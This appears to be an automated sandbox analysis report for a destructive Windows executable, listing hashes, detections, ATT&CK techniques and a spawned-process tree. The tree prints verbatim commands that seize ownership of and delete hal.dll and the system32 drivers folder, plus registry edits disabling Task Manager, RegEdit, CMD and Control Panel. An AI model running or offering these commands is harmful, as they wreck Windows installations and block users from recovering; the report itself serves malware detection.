62dc61ec97bd58357a532b3392a6bed9b562f3d4902fd10a7f7ee91c5d536475

Analysis

max time kernel
76s
max time network
67s
platform
windows10-2004_x64
resource
win10v2004-20240730-en
resource tags

arch:x64arch:x86image:win10v2004-20240730-enlocale:en-usos:windows10-2004-x64system
submitted
01-08-2024 20:53

Sharing

Copy URL

Twitter E-mail

Reason

Machine shutdown

Report Analysis Logs

General

Target

fuckwindows.exe
Size

1.2MB
MD5

816c5a325484587fe43c4be313cf412b
SHA1

76847fb310a648d81933ece3866a5e12879fc272
SHA256

62dc61ec97bd58357a532b3392a6bed9b562f3d4902fd10a7f7ee91c5d536475
SHA512

db0850b791588676e52c211d8e88c6cde7241936a6980ce055f72c0598f5324371c776c86632dc4a2de591d7805adf44e938937298a394bb085f4779a2668cbb
SSDEEP

24576:WQnZkrl1PGVuyhd9tBDgYW9sVTHzw9ulgUTYqwQ4co+y8BrVRHKV9OuVGawkU5dl:lTYYD4Hw

Score

8^/10

defense_evasion discovery evasion exploit ransomware

Malware Config

Signatures

Disables RegEdit via registry modification 1 IoCs

evasion

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-1266786182-1874524688-71015548-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1"	reg.exe

Disables Task Manager via registry modification
evasion

Possible privilege escalation attempt 3 IoCs

exploit

pid	Process
1052	takeown.exe
220	icacls.exe
4700	takeown.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1266786182-1874524688-71015548-1000\Control Panel\International\Geo\Nation	fuckwindows.exe

Modifies file permissions 1 TTPs 3 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
1052	takeown.exe
220	icacls.exe
4700	takeown.exe

File and Directory Permissions Modification: Windows File and Directory Permissions Modification 1 TTPs
defense_evasion

Windows File and Directory Permissions Modification
T1222.001

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1266786182-1874524688-71015548-1000\Control Panel\Desktop\Wallpaper = "c:\\windows\\system32\\WindowsSecurityIcon.png"	reg.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Modifies registry class 9 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1266786182-1874524688-71015548-1000_Classes\Local Settings	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-1266786182-1874524688-71015548-1000_Classes\Local Settings	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-1266786182-1874524688-71015548-1000_Classes\Local Settings	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-1266786182-1874524688-71015548-1000_Classes\Local Settings	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-1266786182-1874524688-71015548-1000_Classes\Local Settings	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-1266786182-1874524688-71015548-1000_Classes\Local Settings	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-1266786182-1874524688-71015548-1000_Classes\Local Settings	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-1266786182-1874524688-71015548-1000_Classes\Local Settings	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-1266786182-1874524688-71015548-1000_Classes\Local Settings	explorer.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
4696	fuckwindows.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeTakeOwnershipPrivilege	1052	takeown.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4696 wrote to memory of 1808	4696	fuckwindows.exe	88
PID 4696 wrote to memory of 1808	4696	fuckwindows.exe	88
PID 4696 wrote to memory of 208	4696	fuckwindows.exe	90
PID 4696 wrote to memory of 208	4696	fuckwindows.exe	90
PID 4696 wrote to memory of 3996	4696	fuckwindows.exe	91
PID 4696 wrote to memory of 3996	4696	fuckwindows.exe	91
PID 4696 wrote to memory of 1796	4696	fuckwindows.exe	94
PID 4696 wrote to memory of 1796	4696	fuckwindows.exe	94
PID 4696 wrote to memory of 5024	4696	fuckwindows.exe	95
PID 4696 wrote to memory of 5024	4696	fuckwindows.exe	95
PID 4696 wrote to memory of 4772	4696	fuckwindows.exe	96
PID 4696 wrote to memory of 4772	4696	fuckwindows.exe	96
PID 4696 wrote to memory of 1336	4696	fuckwindows.exe	97
PID 4696 wrote to memory of 1336	4696	fuckwindows.exe	97
PID 4696 wrote to memory of 2456	4696	fuckwindows.exe	102
PID 4696 wrote to memory of 2456	4696	fuckwindows.exe	102
PID 4696 wrote to memory of 3452	4696	fuckwindows.exe	104
PID 4696 wrote to memory of 3452	4696	fuckwindows.exe	104
PID 1808 wrote to memory of 1052	1808	cmd.exe	106
PID 1808 wrote to memory of 1052	1808	cmd.exe	106
PID 1808 wrote to memory of 220	1808	cmd.exe	107
PID 1808 wrote to memory of 220	1808	cmd.exe	107
PID 4696 wrote to memory of 2380	4696	fuckwindows.exe	108
PID 4696 wrote to memory of 2380	4696	fuckwindows.exe	108
PID 4696 wrote to memory of 2548	4696	fuckwindows.exe	110
PID 4696 wrote to memory of 2548	4696	fuckwindows.exe	110
PID 4696 wrote to memory of 4608	4696	fuckwindows.exe	112
PID 4696 wrote to memory of 4608	4696	fuckwindows.exe	112
PID 4696 wrote to memory of 1892	4696	fuckwindows.exe	113
PID 4696 wrote to memory of 1892	4696	fuckwindows.exe	113
PID 4696 wrote to memory of 2784	4696	fuckwindows.exe	115
PID 4696 wrote to memory of 2784	4696	fuckwindows.exe	115
PID 4696 wrote to memory of 3232	4696	fuckwindows.exe	118
PID 4696 wrote to memory of 3232	4696	fuckwindows.exe	118
PID 4696 wrote to memory of 4336	4696	fuckwindows.exe	120
PID 4696 wrote to memory of 4336	4696	fuckwindows.exe	120
PID 4696 wrote to memory of 2212	4696	fuckwindows.exe	121
PID 4696 wrote to memory of 2212	4696	fuckwindows.exe	121
PID 4696 wrote to memory of 4284	4696	fuckwindows.exe	123
PID 4696 wrote to memory of 4284	4696	fuckwindows.exe	123
PID 4696 wrote to memory of 1240	4696	fuckwindows.exe	125
PID 4696 wrote to memory of 1240	4696	fuckwindows.exe	125
PID 4696 wrote to memory of 4280	4696	fuckwindows.exe	127
PID 4696 wrote to memory of 4280	4696	fuckwindows.exe	127
PID 4696 wrote to memory of 60	4696	fuckwindows.exe	128
PID 4696 wrote to memory of 60	4696	fuckwindows.exe	128
PID 4696 wrote to memory of 1512	4696	fuckwindows.exe	130
PID 4696 wrote to memory of 1512	4696	fuckwindows.exe	130
PID 4696 wrote to memory of 3064	4696	fuckwindows.exe	132
PID 4696 wrote to memory of 3064	4696	fuckwindows.exe	132
PID 4696 wrote to memory of 4184	4696	fuckwindows.exe	133
PID 4696 wrote to memory of 4184	4696	fuckwindows.exe	133
PID 4696 wrote to memory of 3828	4696	fuckwindows.exe	134
PID 4696 wrote to memory of 3828	4696	fuckwindows.exe	134
PID 4696 wrote to memory of 3936	4696	fuckwindows.exe	135
PID 4696 wrote to memory of 3936	4696	fuckwindows.exe	135
PID 4696 wrote to memory of 4776	4696	fuckwindows.exe	136
PID 4696 wrote to memory of 4776	4696	fuckwindows.exe	136
PID 4696 wrote to memory of 2504	4696	fuckwindows.exe	138
PID 4696 wrote to memory of 2504	4696	fuckwindows.exe	138
PID 4696 wrote to memory of 1928	4696	fuckwindows.exe	140
PID 4696 wrote to memory of 1928	4696	fuckwindows.exe	140
PID 4696 wrote to memory of 4996	4696	fuckwindows.exe	141
PID 4696 wrote to memory of 4996	4696	fuckwindows.exe	141

C:\Users\Admin\AppData\Local\Temp\fuckwindows.exe
"C:\Users\Admin\AppData\Local\Temp\fuckwindows.exe"
1⤵
- Checks computer location settings
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of WriteProcessMemory
PID:4696
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k takeown /f "c:\windows\system32\hal.dll" && icacls "c:\windows\system32\hal.dll" /grant Everyone:(F) && del /f "c:\windows\system32\hal.dll" && exit
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1808
- - C:\Windows\system32\takeown.exe
    takeown /f "c:\windows\system32\hal.dll"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:1052
- - C:\Windows\system32\icacls.exe
    icacls "c:\windows\system32\hal.dll" /grant Everyone:(F)
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:220
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "c:\windows\system32\WindowsSecurityIcon.png" /f
  2⤵
  - Sets desktop wallpaper using registry
  PID:208
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f
  2⤵
  PID:3996
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKCU\SOFTWARE\Policies\Microsoft\Windows\System" /v DisableCMD /t REG_DWORD /d 2 /f
  2⤵
  PID:1796
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop" /v NoChangingWallpaper /t REG_DWORD /d 1 /f
  2⤵
  PID:5024
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoControlPanel /t REG_DWORD /d 1 /f
  2⤵
  PID:4772
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoClose /t REG_DWORD /d 1 /f
  2⤵
  PID:1336
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoRun /t REG_DWORD /d 1 /f
  2⤵
  PID:2456
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableRegistryTools /t REG_DWORD /d 1 /f
  2⤵
  - Disables RegEdit via registry modification
  PID:3452
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe"
  2⤵
  PID:2380
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe"
  2⤵
  PID:2548
- C:\Windows\explorer.exe
  "C:\Windows\explorer.exe"
  2⤵
  - Modifies registry class
  PID:4608
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe"
  2⤵
  PID:1892
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe"
  2⤵
  PID:2784
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe"
  2⤵
  PID:3232
- C:\Windows\System32\notepad.exe
  "C:\Windows\System32\notepad.exe"
  2⤵
  PID:4336
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe"
  2⤵
  PID:2212
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe"
  2⤵
  PID:4284
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe"
  2⤵
  PID:1240
- C:\Windows\explorer.exe
  "C:\Windows\explorer.exe"
  2⤵
  - Modifies registry class
  PID:4280
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe"
  2⤵
  PID:60
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe"
  2⤵
  PID:1512
- C:\Windows\System32\notepad.exe
  "C:\Windows\System32\notepad.exe"
  2⤵
  PID:3064
- C:\Windows\explorer.exe
  "C:\Windows\explorer.exe"
  2⤵
  - Modifies registry class
  PID:4184
- C:\Windows\explorer.exe
  "C:\Windows\explorer.exe"
  2⤵
  - Modifies registry class
  PID:3828
- C:\Windows\System32\notepad.exe
  "C:\Windows\System32\notepad.exe"
  2⤵
  PID:3936
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe"
  2⤵
  PID:4776
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe"
  2⤵
  PID:2504
- C:\Windows\System32\notepad.exe
  "C:\Windows\System32\notepad.exe"
  2⤵
  PID:1928
- C:\Windows\System32\notepad.exe
  "C:\Windows\System32\notepad.exe"
  2⤵
  PID:4996
- C:\Windows\explorer.exe
  "C:\Windows\explorer.exe"
  2⤵
  - Modifies registry class
  PID:752
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe"
  2⤵
  PID:2008
- C:\Windows\explorer.exe
  "C:\Windows\explorer.exe"
  2⤵
  - Modifies registry class
  PID:2132
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe"
  2⤵
  PID:2148
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe"
  2⤵
  PID:2092
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe"
  2⤵
  PID:5100
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe"
  2⤵
  PID:2704
- C:\Windows\explorer.exe
  "C:\Windows\explorer.exe"
  2⤵
  - Modifies registry class
  PID:5088
- C:\Windows\explorer.exe
  "C:\Windows\explorer.exe"
  2⤵
  - Modifies registry class
  PID:1888
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe"
  2⤵
  PID:948
- C:\Windows\System32\notepad.exe
  "C:\Windows\System32\notepad.exe"
  2⤵
  PID:3096
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe"
  2⤵
  PID:4940
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe"
  2⤵
  PID:4900
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe"
  2⤵
  PID:1948
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe"
  2⤵
  PID:2820
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe"
  2⤵
  PID:4548
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe"
  2⤵
  PID:4368
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe"
  2⤵
  PID:228
- C:\Windows\System32\notepad.exe
  "C:\Windows\System32\notepad.exe"
  2⤵
  PID:5132
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe"
  2⤵
  PID:5172
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe"
  2⤵
  PID:5228
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe"
  2⤵
  PID:5284
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe"
  2⤵
  PID:5336
- C:\Windows\System32\notepad.exe
  "C:\Windows\System32\notepad.exe"
  2⤵
  PID:5380
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe"
  2⤵
  PID:5416
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe"
  2⤵
  PID:5472
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe"
  2⤵
  PID:5528
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe"
  2⤵
  PID:5584
- C:\Windows\System32\notepad.exe
  "C:\Windows\System32\notepad.exe"
  2⤵
  PID:5592
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe"
  2⤵
  PID:5708
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe"
  2⤵
  PID:5872
- C:\Windows\explorer.exe
  "C:\Windows\explorer.exe"
  2⤵
  - Modifies registry class
  PID:5908
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe"
  2⤵
  PID:5936
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe"
  2⤵
  PID:6012
- C:\Windows\System32\notepad.exe
  "C:\Windows\System32\notepad.exe"
  2⤵
  PID:6112
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe"
  2⤵
  PID:5296
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe"
  2⤵
  PID:2352
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe"
  2⤵
  PID:3856
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe"
  2⤵
  PID:5924
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:5908
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe"
  2⤵
  PID:6168
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe"
  2⤵
  PID:6272
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe"
  2⤵
  PID:6348
- C:\Windows\System32\notepad.exe
  "C:\Windows\System32\notepad.exe"
  2⤵
  PID:6356
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe"
  2⤵
  PID:6384
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe"
  2⤵
  PID:6444
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe"
  2⤵
  PID:6472
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe"
  2⤵
  PID:6520
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe"
  2⤵
  PID:6652
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe"
  2⤵
  PID:6736
- C:\Windows\explorer.exe
  "C:\Windows\explorer.exe"
  2⤵
  PID:6808
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe"
  2⤵
  PID:6864
- C:\Windows\System32\notepad.exe
  "C:\Windows\System32\notepad.exe"
  2⤵
  PID:6892
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe"
  2⤵
  PID:6952
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe"
  2⤵
  PID:7000
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe"
  2⤵
  PID:7164
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe"
  2⤵
  PID:2908
- C:\Windows\explorer.exe
  "C:\Windows\explorer.exe"
  2⤵
  PID:6376
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe"
  2⤵
  PID:1836
- C:\Windows\explorer.exe
  "C:\Windows\explorer.exe"
  2⤵
  PID:2856
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe"
  2⤵
  PID:5740
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe"
  2⤵
  PID:6752
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe"
  2⤵
  PID:4192
- C:\Windows\System32\notepad.exe
  "C:\Windows\System32\notepad.exe"
  2⤵
  PID:6088
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe"
  2⤵
  PID:5980
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe"
  2⤵
  PID:7220
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe"
  2⤵
  PID:7280
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe"
  2⤵
  PID:7328
- C:\Windows\System32\notepad.exe
  "C:\Windows\System32\notepad.exe"
  2⤵
  PID:7404
- C:\Windows\explorer.exe
  "C:\Windows\explorer.exe"
  2⤵
  PID:7412
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe"
  2⤵
  PID:7460
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe"
  2⤵
  PID:7536
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe"
  2⤵
  PID:7604
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe"
  2⤵
  PID:7684
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe"
  2⤵
  PID:7724
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe"
  2⤵
  PID:7844
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe"
  2⤵
  PID:7916
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe"
  2⤵
  PID:8000
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe"
  2⤵
  PID:8036
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe"
  2⤵
  PID:8080
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe"
  2⤵
  PID:8116
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe"
  2⤵
  PID:8156
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe"
  2⤵
  PID:5692
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe"
  2⤵
  PID:5668
- C:\Windows\explorer.exe
  "C:\Windows\explorer.exe"
  2⤵
  PID:4616
- C:\Windows\explorer.exe
  "C:\Windows\explorer.exe"
  2⤵
  PID:4600
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe"
  2⤵
  PID:4436
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k takeown /f "c:\windows\system32\drivers\*" && icacls "c:\windows\system32\drivers\*" /grant Everyone:(F) && del /s /q /f "c:\windows\system32\drivers\*" && exit
  2⤵
  PID:1452
- - C:\Windows\system32\takeown.exe
    takeown /f "c:\windows\system32\drivers\*"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:4700
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" wininit.exe
  2⤵
  PID:4756
- - C:\Windows\system32\wininit.exe
    "C:\Windows\system32\wininit.exe"
    3⤵
    PID:1632

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Windows File and Directory Permissions Modification

T1222.001

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact